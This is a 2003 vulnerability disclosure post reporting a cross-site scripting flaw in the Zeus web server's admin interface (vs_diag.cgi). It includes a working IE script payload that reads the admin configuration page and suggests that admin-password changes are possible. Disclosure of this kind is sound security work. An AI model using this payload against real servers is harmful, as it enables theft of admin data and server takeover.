"Zeus Web Server is the most scalable, secure and
high-performance web server software available,, underpinning business-critical
solutions for the world's leading web hosting, content provider and
secure e-commerce companies." (from: www.zeus.com)
Emm,... :-) another XSS, now on the ZEUS web admin interface.
The tested software is Zeus 4.2r2 (webadmin-4.2r2) on Linux x86.
This is not the same issue as bugtraq bid 6144 (index.fcgi),
now is on "vs_diag.cgi". Exploit is simple: http://<target>:9090/apps/web/vs_diag.cgi?server=<YOUR_CODE>
I have read this post: (http://www.securityfocus.com/archive/1/302961),
regarding "index.fcgi" XSS.
Mr, Colin Watson, claims that XSS bug on their software is not a
big risk because: "The Zeus Administration Server
uses cookies to record several items oftransient state: the state
of the folding list of groups of virtualservers, and the list
of currently monitored variables and machines ifreal-time
monitoring is in place. It does not use cookies to store any security-sensitive
information (...)"
Who needs cookies? :-) ZEUS uses "Basic Auth" (base 64
encoded) for the session tracking...but ZEUS does not allow http TRACE
method, so we can not run a Cross Site Tracing against
it :-(
I know litle about client side scripting, but probably there's some
way to send POST requests and... change the admin password?, stop
the web server?... I'm quite sure there's some way to do this. With
the script we show below an attacker can do an HTTP request to the
web admin interface of the ZEUS and redirect the output...
Of course you have to trick the admin...
http://<target>:9090/apps/web/vs_diag.cgi?server=<script>function%20pedo(){var%20xmlHttp
%20=%20new%20ActiveXObject("Microsoft.XMLHTTP");xmlHttp.open("GET","http://<target>:9090
/apps/web/global.fcgi",false);xmlHttp.send();xmlDoc=xmlHttp.responseText;document.write(xmlDoc);}
pedo();alert("Have%20you%20enabled%20the%20protection%20of%20your%20ZEUS...?%20We%20
can%20rip%20this%20info!%20Much%20more%20evil%20actions%20are%20possible...")</script>
This is for IE, for other browsers you may modify this code.
Imagination is the best friend of the attacker. Open your minds, XSS
does not only means execution of commands on the client side... succefully
exploited, in some scenarios (like web admin interfaces), those bugs
can lead on execution of actions on the server side...
Hugo Vázquez Caramés & Toni Cortés Martínez
INFOHACKING RESEARCH 2003
Barcelona
Spain